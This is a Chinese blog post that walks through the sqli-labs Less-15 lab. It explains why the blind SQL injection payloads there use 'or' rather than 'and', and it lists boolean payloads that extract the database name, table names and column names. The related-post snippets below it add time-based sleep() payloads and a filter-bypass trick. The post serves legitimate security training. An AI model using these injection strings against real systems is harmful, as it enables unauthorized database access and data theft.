关于sqli-lab Less-15使用 or 而不是 and 解析

最新推荐文章于 2024-07-12 14:26:59 发布
最新推荐文章于 2024-07-12 14:26:59 发布
阅读量412 收藏
点赞数
文章标签: 数据库 database sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/121871131
版权

按照以往思路,尝试一下报错的手段,发现并没有输出报错的语句,查看源码,发现确实没有输出语句(所以考虑使用盲注的手法)

(以15题为例)

  • 判断数据库长度:’or (length(database()))=8-- q

  • 判断数据库名字:'or (ascii(substr(database(),1,1)))=115-- q

  • 判断表的名字:'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q

  • 判断列的名字:'or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q

我们发现在之前的八关和九关我们使用的是and; 而到了15关,我们使用的是 or ,让我们观察下面两关原代码(以九题和十五题为例)

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hpzsEuec-1639194328367)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20211211113557894.png)]

现在我们将这两个语句放在一起:

在这里插入图片描述

不难看出,如果我们在15题使用and 那么就会变成:

在这里插入图片描述

显然不成立,因为我们不清楚username的值。如果使用or,那么后面的值成立就整体成立。

而在9题中 id=1 是成立的所以可以使用and来作为语句的连接。

hcjtn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs学习笔记(五)less 15-16 post盲注
闵行小鱼塘
09-08 556
继续学习sqli-labs,本篇是less15-16
sqli-labs Less-15
qq_42630215的博客
03-29 163
Less-15 POST -Blind -Boolian/time Based -Single quotes 0x01. 按F12查看界面代码,获取上传表单的值是为uname和passwd uname相当于登录框中的username passwd相当于登陆框中的password 任意输入uname 和 passwd , 只返回错误界面,但无任何报错信息 构造永真条件使返回忽略用户名和密码不正确这...
sqli-labs(十二)(and和or的过滤)
weixin_30439031的博客
08-30 130
第二十五关: 这关是过滤了and 和or 输入?id=1' or '1'='1 发现or被过滤了,将or换成and也一样。 输入?id=1' oorr '1'='1 这样就可以了,将一个or置空后,oorr还是会变成or。 其实感觉这关有点问题就是,这关可以利用联合注入来查询,其实根本不需要and和or的,and和or只是测试的时候初步判断注入的一种方法,不是需要的步骤...
Sqli-Labs(第11关~第42关)通关笔记
weixin_54894046的博客
11-16 1080
sql注入lesson-11~31
SQLi LABS Less 15 布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十五关,SQLi-LABS Less-15,SQLi-LABS Less 15,SQLiLABS Less15,SQLi Less 15
sqli-lab刷题Less-15 一些有趣的发现,关于burpsuite
MichealCurry1的博客
10-09 174
sqli-lab刷题Less-15 一些有趣的发现,关于burpsuite sqli-labLess-15使用的是post方法提交的表单,因此参数不可见,这种情况下有两种方法查看参数的提交 1.查看网页源代码 右击网页,点击view source,可以查看网页源代码 在这里可以看到两个input标签中各有name='uname',name='passwd',因此参数的提交方式为uname=1&passwd=1 2.使用burp suite 先设置浏览器的代理,在火狐浏览器中点击设置
Sqli-labs之Less-15和Less-16
→_→
04-08 2170
Less-15 基于布尔型/时间延迟单引号POST型盲注 测试: ?id=1uname=1&passwd=1uname=1&passwd=1 ?id=1'...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
Sqlilabs Less15-16
qq_45785324的博客
07-12 303
SqliLabs Less15 Less16
Sqlilabs-15
KAKA的博客
07-07 837
这一关来到了第 15 关,值得注意的是,这一关是布尔和时间盲注的结合关,很好玩哦~ 因为有时间盲注,这里就直接上菜了,下面是几个例子 –查表 uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查列 uname=admin' a
2020.4.4 sqli-labs--第十五、十六关 ②
DSR446的博客
04-04 433
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 方法一 盲注 - 基于布尔值 - 字符串 怎么输入都没有回显,那就时间延迟吧。 布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...
sqli-labs靶场第十五关
gou1791241251的博客
12-27 947
第十五关没什么特殊的,只是单引号闭合而已。
sqli-labs(15-19关)笔记
博客
04-17 2799
15关 查看源码如下: 这里看护出是用post提交的参数,下面把回显报错给注释掉了,现在得知我们只能用延时注入
sqli-labs lesson 11-15 通关 解析 学习sql注入
weixin_44286136的博客
05-19 285
lesson 11
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 138
USE sbms;
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值